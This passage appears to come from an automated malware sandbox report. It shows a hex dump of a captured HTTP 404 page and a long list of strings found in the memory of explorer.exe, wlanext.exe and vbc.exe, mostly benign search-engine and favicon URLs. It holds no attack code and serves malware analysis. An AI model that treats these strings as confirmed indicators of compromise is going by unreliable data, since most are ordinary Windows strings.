74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
          Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: wlanext.exe, 00000009.00000002.2401705675.000000000294F000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000007.00000000.2107641557.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000007.00000000.2115039811.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoz
          Source: explorer.exe, 00000007.00000000.2120867977.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
